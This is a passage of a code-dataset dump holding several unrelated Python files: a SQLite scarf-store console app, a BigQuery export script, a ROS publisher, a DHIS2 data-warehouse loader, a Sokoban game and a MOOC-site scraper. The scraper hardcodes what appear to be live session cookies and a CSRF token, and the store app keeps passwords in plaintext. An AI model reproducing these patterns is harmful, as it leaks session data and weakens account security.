while(rota.lower() == \"yes\" or rota.lower() == \"y\"):\r\n appMember()\r\n rota=input(\"approve next member ? yes or no ?\")\r\n elif(selection == 2):\r\n addStaff()\r\n elif(selection == 3):\r\n viewStaff()\r\n elif (selection == 4):\r\n removeStaff()\r\n elif (selection == 5):\r\n removeMember()\r\n ansss=input(\"Other Task ? Yes or no ? 
:\")\r\n n=1\r\n break\r\n elif (username != row[0] and password == row[1]):\r\n pass\r\n elif (username == row[0] and password != row[1]):\r\n pass\r\n if (n == 0):\r\n print(\"No user data found, check your username and password\")\r\n\r\ndef calculatePrice(name2,status):\r\n holdw = conn.execute(\"SELECT id,status from MEMBER\")\r\n data = []\r\n dataon = []\r\n newprice = 0\r\n discounted = 0\r\n priceB = 0\r\n priceN = 0\r\n priceF = 0\r\n priceD = 0\r\n priceaddon = 0\r\n quantityaddon = 0\r\n nodata = \"\"\r\n answer = \"yes\"\r\n addon = \"yes\"\r\n add = \"yes\"\r\n print(\"WELCOME\",status.upper(),name2.upper())\r\n print(\"#---------------------------------------------------#\")\r\n print(\"| |\")\r\n print(\"| CATALAOG SCARF STORE |\")\r\n print(\"| |\")\r\n print(\"#---------------------------------------------------#\")\r\n print(\"| CODENAME | NAME | PRICE(RM) |\")\r\n print(\"| aidijuma | AIDIJUMA HIJAB | 40.00 |\")\r\n print(\"| lofahijab | NEELOFA HIJAB | 80.00 |\")\r\n print(\"| fareeda | FAREEDA HIJAB | 100.00 |\")\r\n print(\"| duck | dUck SCARF | 130.00 |\")\r\n print(\"|___________|___________________________|___________|\")\r\n name = input(\"Enter Name : \")\r\n data.append(name)\r\n ic = input(\"Enter the IC number: \")\r\n id = int(input(\"Enter ID : \"))\r\n data.append(ic)\r\n count = 1\r\n countadd = 1\r\n while (answer.lower() == \"yes\" or answer.lower() == \"y\"):\r\n brand = input(\"Enter type of tudung : \")\r\n data.append(brand)\r\n if brand.lower() == \"aidijuma\":\r\n print(\"Colours Avaiable\")\r\n print(\"- choco lava\")\r\n print(\"- grey sky morning\")\r\n print(\"- coldplay\")\r\n print(\"- butterfingers\")\r\n colours = input(\"Enter colours : \")\r\n data.append(colours)\r\n quantity = int(input(\"Enter the quantity of Aidijuma Hijab : \"))\r\n data.append(quantity)\r\n price = quantity * 40\r\n priceB += price\r\n\r\n elif brand.lower() == \"lofahijab\":\r\n print(\"Colours Avaiable\")\r\n print(\"- choco lava\")\r\n print(\"- grey sky morning\")\r\n print(\"- coldplay\")\r\n print(\"- butterfingers\")\r\n colours = input(\"Enter colours : \")\r\n data.append(colours)\r\n quantity = int(input(\"Enter the quantity of Neelofa Hijab : \"))\r\n data.append(quantity)\r\n price = quantity * 80\r\n priceN = price + priceN\r\n elif brand.lower() == \"fareeda\":\r\n print(\"Colours Avaiable\")\r\n print(\"- choco lava\")\r\n print(\"- grey sky morning\")\r\n print(\"- coldplay\")\r\n print(\"- butterfingers\")\r\n colours = input(\"Enter colours : \")\r\n data.append(colours)\r\n quantity = int(input(\"Enter the quantity of Fareeda Hijab : \"))\r\n data.append(quantity)\r\n price = quantity * 100\r\n priceF = price + priceF\r\n elif brand.lower() == \"duck\":\r\n print(\"Colours Avaiable\")\r\n print(\"- choco lava\")\r\n print(\"- grey sky morning\")\r\n print(\"- coldplay\")\r\n print(\"- butterfingers\")\r\n colours = input(\"Enter colours : \")\r\n data.append(colours)\r\n quantity = int(input(\"Enter the quantity of dUck Scarf : \"))\r\n data.append(quantity)\r\n price = quantity * 130\r\n priceD = price + priceD\r\n answer = input(\"Do you still want to shopping with us ? : \")\r\n if (answer.lower() == \"yes\" or answer.lower() == \"y\"):\r\n count += 1\r\n else:\r\n newprice += priceB + priceN + priceD + priceF\r\n addon = input(\"Do you want to add on? 
:\")\r\n if (addon.lower() == \"yes\" or addon.lower() == \"y\"):\r\n print(\"masuk\")\r\n add = \"yes\"\r\n while (add.lower() == \"yes\" or add.lower() == \"y\"):\r\n print(\"*---------------------------*\")\r\n print(\"| ADD-ON LIST |\")\r\n print(\"*---------------------------*\")\r\n print(\"| -> Inner Scarf |\")\r\n print(\"| -> Brooch |\")\r\n print(\"| -> Handsock |\")\r\n print(\"| -> Crystal |\")\r\n print(\"|___________________________|\")\r\n tambahan = input(\"Enter add-on : \")\r\n dataon.append(tambahan)\r\n quantityaddon = int(input(\"Enter quantity of your addon : \"))\r\n dataon.append(quantityaddon)\r\n priceaddon = (quantityaddon * 5) + priceaddon\r\n dataon.append(priceaddon)\r\n add = input(\"Do you want to buy add-on again\")\r\n if (add == \"yes\"):\r\n countadd += 1\r\n newprice = newprice + priceaddon\r\n for rotate in holdw:\r\n if(id == rotate[0]):\r\n discounted = newprice - (newprice * 0.1)\r\n else:\r\n discounted = newprice\r\n data.append(newprice)\r\n data.append(discounted)\r\n print(\"*------------------------------------*\\n\")\r\n print(\"| |\\n\")\r\n print(\"| WELCOME TO SCARF STORE |\\n\")\r\n print(\"| |\\n\")\r\n print(\"*------------------------------------*\\n\")\r\n print(now.strftime(\"%Y-%m-%d %H:%M %p\\n\"))\r\n print(\"STAFF : %s\\n\" % name2)\r\n print(\"NAME : %s\\n\" % data[0])\r\n print(\"IC NUMBER : %s \\n\" % data[1])\r\n n = 2\r\n for row in range(0, count):\r\n print(\"BRAND : %s \\n\" % data[n])\r\n print(\"COLOURS : %s \\n\" % data[n + 1])\r\n print(\"QUANTITY : %s \\n\" % data[n + 2])\r\n n += 3\r\n i = 0\r\n for hehe in range(0, countadd):\r\n print(\"ACCESSORIES(RM5) : %s \\n\" % dataon[i])\r\n print(\"QUANTITY OF ACCESSORIES :%s \\n\" % dataon[i + 1])\r\n i += 2\r\n print(\"TOTAL PRICE OF ACCESSORIES : %s \\n\" % dataon[i])\r\n print(\"TOTAL PRICE : %s \\n\" % data[n])\r\n print(\"AFTER DISCOUNT : %s \\n\" % data[n+1])\r\n\r\n file = open(ic + '.txt', 'a')\r\n file.write(\"*------------------------------------*\\n\")\r\n file.write(\"| |\\n\")\r\n file.write(\"| WELCOME TO SCARF STORE |\\n\")\r\n file.write(\"| |\\n\")\r\n file.write(\"*------------------------------------*\\n\")\r\n file.write(now.strftime(\"%Y-%m-%d %H:%M %p\\n\"))\r\n file.write(\"STAFF : %s\\n\" % name2)\r\n file.write(\"NAME : %s\\n\" % data[0])\r\n file.write(\"IC NUMBER : %s \\n\" % data[1])\r\n n = 2\r\n for row in range(0, count):\r\n file.write(\"BRAND : %s \\n\" % data[n])\r\n file.write(\"COLOURS : %s \\n\" % data[n + 1])\r\n file.write(\"QUANTITY : %s \\n\" % data[n + 2])\r\n n += 3\r\n i = 0\r\n for hehe in range(0, countadd):\r\n file.write(\"ACCESSORIES(RM5) : %s \\n\" % dataon[i])\r\n file.write(\"QUANTITY OF ACCESSORIES :%s \\n\" % dataon[i + 1])\r\n i += 2\r\n file.write(\"TOTAL PRICE OF ACCESSORIES : %s \\n\" % dataon[i])\r\n file.write(\"TOTAL PRICE : %s \\n\" % data[n])\r\n file.write(\"AFTER DISCOUNT : %s \\n\" % data[n + 1])\r\n file.close()\r\n else:\r\n dataon.append(nodata)\r\n data.append(newprice)\r\n for rotate in holdw:\r\n if(id == rotate[0]):\r\n discounted = newprice - (newprice * 0.1)\r\n else:\r\n discounted = newprice\r\n data.append(discounted)\r\n print(\"*------------------------------------*\\n\")\r\n print(\"| |\\n\")\r\n print(\"| WELCOME TO SCARF STORE |\\n\")\r\n print(\"| |\\n\")\r\n print(\"*------------------------------------*\\n\")\r\n print(now.strftime(\"%Y-%m-%d %H:%M %p\\n\"))\r\n print(\"STAFF : %s\\n\" % name2)\r\n print(\"NAME : %s\\n\" % data[0])\r\n print(\"IC NUMBER : %s \\n\" % data[1])\r\n n = 2\r\n 
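# Note (added): data is a flat list -- name, ic, then one (brand, colour, quantity) triple per purchase, then total and discounted price -- and n walks the triples below.\r\n        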
for row in range(0, count):\r\n print(\"BRAND : %s \\n\" % data[n])\r\n print(\"COLOURS : %s \\n\" % data[n + 1])\r\n print(\"QUANTITY : %s \\n\" % data[n + 2])\r\n n += 3\r\n print(\"ACCESSORIES(RM5) : %s \\n\" % dataon[0])\r\n print(\"QUANTITY OF ACCESSORIES :%s \\n\" % dataon[0])\r\n print(\"TOTAL PRICE OF ACCESSORIES : %s \\n\" % dataon[0])\r\n print(\"TOTAL PRICE : %s \\n\" % data[n])\r\n print(\"AFTER DISCOUNT : %s \\n\" % data[n + 1])\r\n\r\n file = open(ic + '.txt', 'a')\r\n file.write(\"*------------------------------------*\\n\")\r\n file.write(\"| |\\n\")\r\n file.write(\"| WELCOME TO SCARF STORE |\\n\")\r\n file.write(\"| |\\n\")\r\n file.write(\"*------------------------------------*\\n\")\r\n file.write(now.strftime(\"%Y-%m-%d %H:%M %p\\n\"))\r\n file.write(\"STAFF : %s\\n\" % name2)\r\n file.write(\"NAME : %s\\n\" % data[0])\r\n file.write(\"IC NUMBER : %s \\n\" % data[1])\r\n n = 2\r\n for row in range(0, count):\r\n file.write(\"BRAND : %s \\n\" % data[n])\r\n file.write(\"COLOURS : %s \\n\" % data[n + 1])\r\n file.write(\"QUANTITY : %s \\n\" % data[n + 2])\r\n n += 3\r\n file.write(\"ACCESSORIES(RM5) : %s \\n\" % dataon[0])\r\n file.write(\"QUANTITY OF ACCESSORIES :%s \\n\" % dataon[0])\r\n file.write(\"TOTAL PRICE OF ACCESSORIES : %s \\n\" % dataon[0])\r\n file.write(\"TOTAL PRICE : %s \\n\" % data[n])\r\n file.write(\"AFTER DISCOUNT : %s \\n\" % data[n + 1])\r\n file.close()\r\n\r\n\r\ndef viewMember():\r\n\r\n cursor = conn.execute(\"SELECT id, name, age, address, status from MEMBER\")\r\n for row in cursor:\r\n print(\"ID = \", row[0])\r\n print(\"NAME = \", row[1])\r\n print(\"AGE = \", row[2])\r\n print(\"ADDRESS = \", row[3])\r\n print(\"STATUS = \", row[4], \"\\n\")\r\n\r\ndef viewStaff():\r\n\r\n cursor2 = conn.execute(\"SELECT username, status from LOGIN\")\r\n for row2 in cursor2:\r\n print(\"ID = \", row2[0])\r\n print(\"STATUS = \", row2[1], \"\\n\")\r\n\r\ndef appMember():\r\n\r\n approve = conn.execute(\"SELECT id, status from MEMBER\")\r\n id=int(input(\"Enter ID\"))\r\n statuss=\"Approve\"\r\n conn.execute('''UPDATE MEMBER SET STATUS = ? WHERE id = ? ''',(statuss, id))\r\n conn.commit()\r\n\r\ndef updatePassword():\r\n usern=input(\"Enter Staff Name : \")\r\n passww=input(\"Enter New Password : \")\r\n conn.execute('''UPDATE LOGIN SET PASSWORD = ? WHERE USERNAME = ? 
''',(passww,usern))\r\n conn.commit()\r\n\r\ndef addMember():\r\n\r\n memID=int(input(\"Enter ID : \"))\r\n memName=input(\"Enter Name : \")\r\n memAge=int(input(\"Enter Age : \"))\r\n memAddress=input(\"Enter Address : \")\r\n memStatus=\"Pending\"\r\n conn.execute(\"INSERT INTO MEMBER (ID,NAME,AGE,ADDRESS,STATUS) VALUES (?, ?, ?, ?, ?)\",(memID,memName,memAge,memAddress,memStatus))\r\n conn.commit()\r\n\r\ndef addStaff():\r\n staName = input(\"Enter Name : \")\r\n staPassword = input(\"Enter Password : \")\r\n staStatus = \"staff\"\r\n conn.execute(\"INSERT INTO LOGIN (username,password,status) VALUES (?, ?, ?)\",\r\n (staName,staPassword, staStatus))\r\n conn.commit()\r\n\r\ndef removeMember():\r\n\r\n id3=int(input(\"Enter Member Id : \"))\r\n conn.execute('DELETE FROM MEMBER WHERE id=?', (id3,))\r\n conn.commit()\r\n\r\ndef removeStaff():\r\n\r\n name3 = input(\"Enter Staff Name : \")\r\n conn.execute('DELETE FROM LOGIN WHERE username=?', (name3,))\r\n conn.commit()\r\n\r\nmainUI()\r\nlogIn(n)\r\nconn.close()\r\nclosingUI()","sub_path":"SCARF STORE.py","file_name":"SCARF STORE.py","file_ext":"py","file_size_in_byte":18066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"414644044","text":"from google.cloud import bigquery, storage\nimport traceback\nimport logging\n\n\ndef create_table(project, dataset_id, table_id):\n\n schema = [\n bigquery.SchemaField(\"event_name\", \"STRING\", mode=\"NULLABLE\"),\n bigquery.SchemaField(\"user_id\", \"STRING\", mode=\"NULLABLE\"),\n bigquery.SchemaField(\"user_pseudo_id\", \"STRING\", mode=\"NULLABLE\"),\n bigquery.SchemaField(\"event_date\", \"DATE\", mode=\"NULLABLE\")\n ]\n\n client = bigquery.Client()\n\n tbl = project + '.' + dataset_id + '.' + table_id\n\n table = bigquery.Table(tbl, schema=schema)\n table = client.create_table(table)\n print(\n \"Created table {}.{}.{}\".format(table.project, table.dataset_id, table.table_id)\n )\n\ndef populate_table():\n\n client = bigquery.Client()\n\n query_job = client.query(\"\"\"\nINSERT INTO `?.?.app_events`\n(event_name, user_id, user_pseudo_id, event_date)\nSELECT event_name, user_id, user_pseudo_id, PARSE_DATE('%Y%m%d', event_date) as event_date\nFROM\n `ez-mobileapp-prodtest.analytics_200206438.events_*`\nGROUP BY\n event_name,user_id,user_pseudo_id,event_date;\n \"\"\")\n\n results = query_job.result()\n\n for row in results:\n print(\"{} : {} views\".format(row.url, row.view_count))\n\n\ndef download_table():\n\n client = bigquery.Client()\n\n destination_uri = \"gs://{}/{}\".format(bucket_name, \"app_events.csv\")\n dataset_ref = client.dataset(dataset_id, project=project)\n table_ref = dataset_ref.table(table_id)\n\n extract_job = client.extract_table(\n table_ref,\n destination_uri,\n location='US')\n extract_job.result()\n\n print(\n \"Exported {}:{}.{} to {}\".format(\n project, dataset_id, table_id, destination_uri)\n )\n\n\ndef download_blob(bucket_name, source_blob_name, destination_file_name): # test passed\n\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n\n blob.download_to_filename(destination_file_name)\n\n print('Blob {} downloaded to {}.'.format(\n source_blob_name,\n destination_file_name))\n\ndef clean_table():\n\n client = bigquery.Client()\n\n tbl = project + '.' + dataset_id + '.' 
+ table_id\n\n client.delete_table(tbl, not_found_ok=False)\n print(\"Deleted table '{}'.\".format(tbl))\n\n\nif __name__ == '__main__':\n\n project = \"?-?-?\"\n dataset_id = \"?\"\n table_id = \"app_events\"\n bucket_name = \"?\"\n source_blob_name = \"app_events.csv\"\n destination_file_name = \"/?/?/app_events_downloaded.csv\"\n\nexitCode = 0\ntry :\n create_table(project, dataset_id, table_id)\n populate_table()\n download_table()\n download_blob(bucket_name, source_blob_name, destination_file_name)\n clean_table()\n\nexcept Exception as e :\n\tprint('Exception')\n\tlogging.error(traceback.format_exc())\n\texitCode = 1\nelse :\n\tprint('Success!')\n\texitCode = 0\nfinally :\n\tprint(': Done.')\n\nexit(exitCode)\n","sub_path":"firebase.py","file_name":"firebase.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"629030486","text":"#!/usr/bin/env python\n\nimport rospy\nfrom spring_seminar.msg import Pos\nfrom spring_seminar.msg import State\n\ndef pos_publisher():\n pub = rospy.Publisher('position', Pos, queue_size=10)\n rospy.init_node('test_pub', anonymous=True)\n r = rospy.Rate(1)\n x_pos = 1.0\n y_pos = 1.0\n z_pos = 1.0\n msg = Pos()\n while not rospy.is_shutdown():\n msg.x_pos = x_pos\n msg.y_pos = y_pos\n msg.z_pos = z_pos\n\n rospy.loginfo(\"Position:%s,%s,%s\" ,x_pos, y_pos, z_pos)\n pub.publish(msg)\n r.sleep()\n\ndef state_publisher():\n pub = rospy.Publisher('state', State, queue_size=10)\n rospy.init_node('test_pub', anonymous=True)\n r = rospy.Rate(1)\n state = 0\n msg = State()\n while not rospy.is_shutdown():\n msg.State = state\n\n rospy.loginfo(\"State:%s\", state)\n pub.publish(msg)\n r.sleep()\n\nif __name__ == '__main__':\n try:\n pos_publisher()\n except rospy.ROSInterruptException: pass\n # try:\n # state_publisher()\n # except rospy.ROSInterruptException: pass\n","sub_path":"scripts/test_publisher.py","file_name":"test_publisher.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"414732100","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPartners in Health DHIS Data Warehousing Project\n\nObjective: Develop a tool that extracts data from DHIS2 Web API and loads into central data warehouse\nCountry: Liberia\n\nSteps:\n 1) Create Liberia MySQL Database\n 2) Run this script - set variable to allow total upload\n 3) Run this script - set variable to allow weekly upload\n 4) Set up Cron Scheduler to run on weekly basis\n\"\"\"\n\n# Import all relevant packages\nimport requests\nimport json\nfrom pprint import pprint\nimport pandas as pd\nimport itertools\nimport re\nimport mysql.connector\nfrom pandas.io import sql\nfrom sqlalchemy import create_engine\nimport pymysql\nimport datetime\n\n\n###########################################################################\n# Set Permanent Global variables\n###########################################################################\n\n####set variable to allow total upload\n## To re-run the initial install and import all metadata from the start,\n## un-comment the initialize line.\n__name__ = \"initialize\"\n\n# Source DHIS2 credentials and base URL\nauthorization = ('TODO-DHIS-USERNAME', 'TODO-DHIS-PASSWORD')\nbase_url = \"https://TODO-SERVER-URL/dhis/api\"\n\n# Target database credentials and database name\nsql_user = \"TODO-SQL-USERNAME\"\nsql_pw = \"TODO-SQL-PASSWORD\"\nsql_db = \"liberia_dhis_warehouse\"\n\n# Set Time period\nif __name__ 
== \"__main__\":\n period = \"pe:LAST_12_MONTHS\"\n\nelse:\n years = [\"2000\", \"2001\", \"2002\", \"2003\", \"2004\", \"2005\", \"2006\", \"2007\", \"2008\",\n \"2009\", \"2010\", \"2011\", \"2012\", \"2013\", \"2014\", \"2015\", \"2016\", \"2017\", \"2018\"]\n months = [\"01\", \"02\", \"03\", \"04\", \"05\", \"06\", \"07\", \"08\", \"09\", \"10\", \"11\", \"12\"]\n all_months = ';'.join([year + month for year, month in itertools.product(years, months)])\n period = \"pe:\" + all_months\n\n\n############################################################################\n# Pull informational data\n# E.g., Indicator Groups, Indicators, Organisation Units\n############################################################################\n\n\n################\n# Pull Org Units\n################\n# Create organization units dictionary\n\n#Base OU url\norgUnitsUrl = base_url + \"/organisationUnits?paging=False\"\n\n#Function that pulls each of the org units by level\ndef pull_orgs(orgUnitsUrl, level):\n #request and load into json\n orgs = requests.get(orgUnitsUrl + \"&\" + level, auth = authorization)\n orgs = json.loads(orgs.text)\n\n #iterate and append id and and displayname\n orgUnitsUrl_list = []\n for o in orgs['organisationUnits']:\n for key, value in o.items():\n orgUnitsUrl_list.append(value)\n\n #Convert to dictionary to easily pull in and out. Can just use keys for params\n orgUnits = dict(itertools.zip_longest(*[iter(orgUnitsUrl_list)] * 2, fillvalue=\"\"))\n\n return orgUnits\n\n# Haiti will need to add an extra level (wards)\norgUnits = pull_orgs(orgUnitsUrl, \"level=4\")\ndistricts = pull_orgs(orgUnitsUrl, \"level=3\")\ncounties = pull_orgs(orgUnitsUrl, \"level=2\")\ncountries = pull_orgs(orgUnitsUrl, \"level=1\")\n\n#########################\n# Map Facility Ancestors\n#########################\n\n#Map out the parent relations of each facility\nrelationsurl = base_url + \"/organisationUnits\"\nrelationships = {}\n\nfor key in orgUnits.keys():\n #pull out information for key\n relations = requests.get(relationsurl + \"/\" + key, auth = authorization)\n relations = json.loads(relations.text)\n\n #only want ID\n ancestors = str(relations['ancestors'])\n ancestors = re.findall(r' \\'(.*?)\\'}', ancestors)\n\n #Create dictionary\n relationships[key]=' '.join(ancestors)\n\n\n##################################\n# Pull out Indicator Groups\n##################################\n# Each indicator is part of a program (Indicator Groups)\n# We pull out the indicator groups and use these groups to pull out indicators\n\n# Base URL\nindicatorGroupsUrl = base_url + \"/indicatorGroups?paging=False\"\n\n# Request and load into json\nelements = requests.get(indicatorGroupsUrl, auth = authorization)\nelements = json.loads(elements.text)\n\n\n# Iterate and append id and and displayname\nindicatorGroups_list = []\nfor e in elements['indicatorGroups']:\n for key, value in e.items():\n indicatorGroups_list.append(value)\n\n# Convert to dictionary to easily pull in and out. 
Can just use keys for params\nindicatorGroups = dict(itertools.zip_longest(*[iter(indicatorGroups_list)] * 2, fillvalue=\"\"))\n\n\n# MySQL tables will be named after Indicator Groups\n# Replace names with names amenable to MySQL\nfor key, value in indicatorGroups.items():\n value = value.replace(\"-\",\"_\")\n value = value.replace(\" \", \"_\")\n value = value.replace(\"__\",\"_\")\n value = re.sub(r\"[?|$|\\.|!|\\(|\\)]\", \"\", value)\n indicatorGroups[key] = value\n\n\n##################################\n# Create list of Indicators\n##################################\nindicatorsUrl = base_url + \"/indicators?paging=False\"\n\n#request and load into json\nelements = requests.get(indicatorsUrl, auth = authorization)\nelements = json.loads(elements.text)\n\n\n#iterate and append id and displayname\nindicators_list = []\nfor e in elements['indicators']:\n for key, value in e.items():\n indicators_list.append(value)\n\n#Convert to dictionary to easily pull in and out. Can just use keys for params\nindicators = dict(itertools.zip_longest(*[iter(indicators_list)] * 2, fillvalue=\"\"))\n\n\n###############################\n# Prepare request queries\n###############################\n# Base URL and set base dimensions\ndimensions_base = \"dx:IN_GROUP-\"\nbase = base_url + \"/analytics\"\n\n# CAT organisation units\norgs = \"ou:\"\nfor unit in orgUnits.keys():\n orgs = orgs + unit + \";\"\n\norgs = orgs[:-1]\n\n############################################################################\n# Define Functions to pull relevant data and upload\n############################################################################\n#Pull all relevant data from API\ndef pull_data(dimensions_base, indicator_group, base, time_period, orgs):\n\n\n dimensions = dimensions_base + indicator_group\n params = dict(\n dimension = [dimensions, time_period, orgs])\n\n r = requests.get(base, params = params,\n auth = authorization)\n\n data = json.loads(r.text)\n\n #Check the column names from their email and replace with those\n data = pd.DataFrame(data['rows'], columns = [\"indicator\",\"date\", \"facility\", \"value\"])\n data['ID'] = indicator_group\n\n #map on org units relationships - with org unit dictionaries; a level-4 facility has three ancestors (country, county, district)\n data['temp'] = data['facility']\n data = data.replace({\"temp\":relationships})\n data[\"country\"], data[\"county\"], data[\"district\"] = data['temp'].str.split(\" \", 2).str\n data.drop('temp', axis =1, inplace = True)\n\n #Replace codes with English names\n data = (data.replace({\"indicator\":indicators, \"facility\":orgUnits,\n \"ID\":indicatorGroups,\n \"country\":countries,\n \"county\":counties,\n \"district\":districts}))\n\n data['date'] = pd.to_datetime(data['date'], format = '%Y%m')\n\n return data\n\n\n\n#function checks if a table exists and if not then create it\ndef create_table(data, indicator_group):\n #read in table name from indicator groups list\n table_name = indicatorGroups.get(indicator_group).lower()\n\n #identify whether a table exists\n check_table_query = (\"SHOW TABLES LIKE '\" + table_name + \"'\")\n cursor.execute(check_table_query)\n\n #if table has value then the table exists in the database\n exists = False\n for table in cursor:\n exists = True if len(table) > 0 else False\n print(table_name + \" Exists in MySQL Database already\")\n\n #If exists is true then remove the last 12 months of data from table\n if exists == True:\n year_ago = datetime.date.today() - datetime.timedelta(365)\n year_ago = year_ago.replace(day = 1)\n\n drop_12_months_query = (\"delete from \" + 
table_name + \" where date >= %s;\")\n cursor.execute(drop_12_months_query, (year_ago,))\n con.commit()\n\n #Otherwise create a new table\n elif exists == False: ##Errors around here may be due to oddly named indicator groups\n create_table_query = (\"Create table \" + table_name + \"\"\" (\n ID varchar(50) not null,\n Country varchar(50) not null,\n County varchar(100) not null,\n District varchar(100) not null,\n Facility varchar(125) not null,\n Indicator varchar(200) not null,\n Date date not null,\n Value numeric(25,2) not null);\"\"\")\n\n cursor.execute(create_table_query)\n con.commit()\n\n #Upload data to server\n data.to_sql(con = engine, name = table_name, if_exists = \"append\", index = False)\n\n\n############################################################################\n# Run File\n############################################################################\ndef main(indicator_group):\n data = pull_data(dimensions_base, indicator_group, base, period, orgs)\n create_table(data, indicator_group)\n\n###Establish MySQL connection\ncon = mysql.connector.connect(user = sql_user, password = sql_pw, database = sql_db)\ncursor = con.cursor()\n#MySQL is deprecated in current pandas - need to manually create sql engine\nengine = create_engine(\"mysql+pymysql://\" +sql_user + \":\" + sql_pw + \"@localhost/\" + sql_db)\n\n#loop through all indicator groups\nfor key in indicatorGroups:\n main(key)\n pprint(indicatorGroups.get(key).lower())\n\ncursor.close()\ncon.close()\n","sub_path":"weekly-dhis-upload-liberia.py","file_name":"weekly-dhis-upload-liberia.py","file_ext":"py","file_size_in_byte":9544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"166753670","text":"# from random import randint\nprint(\" Sang trái : a --------- \", end = \"\")\nprint(\" Sang phải : d \")\nprint(\" Lên trên : w --------- \", end = \"\")\nprint(\" Xuống dưới : s \")\nprint(\"P là Payer \")\nprint(\"B là Boxes\")\nprint(\"D là Destinations\")\n\nmap = {\n \"size_x\": 5,\n \"size_y\": 5\n}\n\nplayer = { \n \"x\": 3, \n \"y\": 4 \n}\n\nboxes = [\n { \"x\": 1, \"y\": 1},\n { \"x\": 2, \"y\": 2},\n { \"x\": 3, \"y\": 3}\n]\ndestinations = [\n { \"x\": 2, \"y\": 1},\n { \"x\": 3, \"y\": 2},\n { \"x\": 4, \"y\": 3}\n]\nplaying = True\nwhile playing:\n for y in range(map['size_y']) :\n for x in range(map['size_x']):\n\n player_is_here = False\n if x == player['x'] and y == player['y']:\n player_is_here = True\n\n box_is_here = False\n for box in boxes:\n if box['x'] == x and box['y'] == y and player_is_here is not True :\n box_is_here = True\n break\n \n destinations_is_here = False\n for des in destinations:\n if des['x'] == x and des['y'] == y and player_is_here is not True :\n destinations_is_here = True\n break\n\n if player_is_here :\n print(\" P \", end = \"\")\n elif box_is_here :\n print(\" B \", end = \"\")\n elif destinations_is_here :\n print(\" D \", end = \"\")\n else:\n print(\" - \", end = \"\") \n print()\n\n move = input(\" Your move: \").upper()\n\n dx = 0\n dy = 0\n\n if move == \"W\":\n dy -= 1 \n\n elif move == \"S\":\n dy += 1\n\n elif move == \"A\":\n dx -= 1\n \n elif move == \"D\":\n dx += 1\n \n else:\n print(\"Buzzzz\")\n playing = False\n\n check_box = True\n if 0 <= player['x'] + dx < map['size_x'] and 0 <= player['y'] + dy < map['size_y']:\n player['x'] += dx\n player['y'] += dy\n\n for box in boxes:\n if 0 <= box['x'] + dx < map['size_x'] and 0 <= box['y'] + dy < map['size_y']: \n \n if box['x'] == player['x'] and box['y'] == 
player['y']: \n box['x'] += dx\n box['y'] += dy\n check_box = False\n break\n \n win = True\n for box in boxes:\n if box not in destinations:\n win = False\n if win:\n print(\" ****** * * * * Your Win !!!!!! ** ** * * * *\")\n break \n \n\n \n \n\n\n \n \n \n ","sub_path":"Session05/sokoban.py","file_name":"sokoban.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"401669263","text":"#!/usr/bin/python\r\n#coding=utf-8\r\nimport sys\r\nreload(sys)\r\nsys.setdefaultencoding('utf8')\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom requests import Session\r\nimport urllib2\r\nimport urllib\r\nimport mimetypes\r\nimport os\r\nimport time\r\nimport re\r\n\r\nmooc_login = 'http://www.xuetangx.com/v2/login_ajax'\r\nmooc_mainwindow = 'http://www.xuetangx.com/dashboard'\r\nmooc_course = 'http://www.xuetangx.com'\r\ncourse_url = []\r\ncourse_num = 0\r\n\r\nssid = ''#用户名\r\nkey = ''#密码\r\n\r\ndef addHTTP(str) :\r\n\t'补全路径'\r\n\tif (str[:4] != 'http') : str = 'http://' + str\r\n\treturn str\r\n\r\n#登陆\r\ns = Session()\r\nuserInfo = {'username' : ssid, 'password' : key, 'remember' : 'true', 'csrfmiddlewaretoken' : '3wgo7O0Abz0sGsPDKkToxUypEkifDis4'}\r\n\r\nheader = {\r\n'Accept':'*/*',\r\n'Accept-Encoding':'gzip, deflate',\r\n'Accept-Language':'zh-CN,zh;q=0.8',\r\n'Connection':'keep-alive',\r\n'Content-Length':'114',\r\n'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',\r\n'Cookie':'video_player_volume_level=54; hide_captions=true; Hm_lvt_32d56203d9a79a16a032531755dad60e=1437532428,1437552515,1437612130,1438765178; ajs_anonymous_id=%22694d3836-743c-42aa-885f-bd611ec7e543%22; sessionid=b4d386a777bb86d49a0b8a26491ce8ac; ajs_group_id=null; ajs_user_id=null; frontendUserTrack=29585; frontendUserReferrer=http://www.xuetangx.com/; sequence=9; csrftoken=3wgo7O0Abz0sGsPDKkToxUypEkifDis4',\r\n'Host':'www.xuetangx.com',\r\n'Origin':'http://www.xuetangx.com',\r\n'Referer':'http://www.xuetangx.com/',\r\n'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36',\r\n'X-CSRFToken':'3wgo7O0Abz0sGsPDKkToxUypEkifDis4',\r\n'X-Requested-With':'XMLHttpRequest'\r\n}\r\n\r\nloginSession = s.post(mooc_login, userInfo, headers = header, verify = True)\r\ndashboard = s.get(mooc_mainwindow)\r\nsoup = BeautifulSoup(dashboard.text, \"html.parser\")\r\n#print soup\r\n\r\n#进入主界面\r\n######################################################################\r\n\r\ncourselist = soup.find_all(\"a\", \"enter-course\")\r\n#print courselist\r\n#for course in courselist:\r\ncourse = courselist[0];\r\ntemp = str(course)\r\nfindurl = re.match(r'.*', temp, re.M | re.I)\r\n#print type(findurl)\r\ncourse_url.append(mooc_course + findurl.group(1))\r\ncourse_num += 1\r\n#print course_url[0]\r\n\r\ncourseboard1 = s.get(course_url[0])\r\nsoup_course1 = BeautifulSoup(courseboard1.text, \"html.parser\")\r\ncourse1_menu = soup_course1.find(\"ol\", \"course-tabs\");\r\n#print course1_menu\r\nentervideolist = course1_menu.find(\"a\")\r\nmatch_videolisturl = re.match(r'.*', str(entervideolist), re.M | 